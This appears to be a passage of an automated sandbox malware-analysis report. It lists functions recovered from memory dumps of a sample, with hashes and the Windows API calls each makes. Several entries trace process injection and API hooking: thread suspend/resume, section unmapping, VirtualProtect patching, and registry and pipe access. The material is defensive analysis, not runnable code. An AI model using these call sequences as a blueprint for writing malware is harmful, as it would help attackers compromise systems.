Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
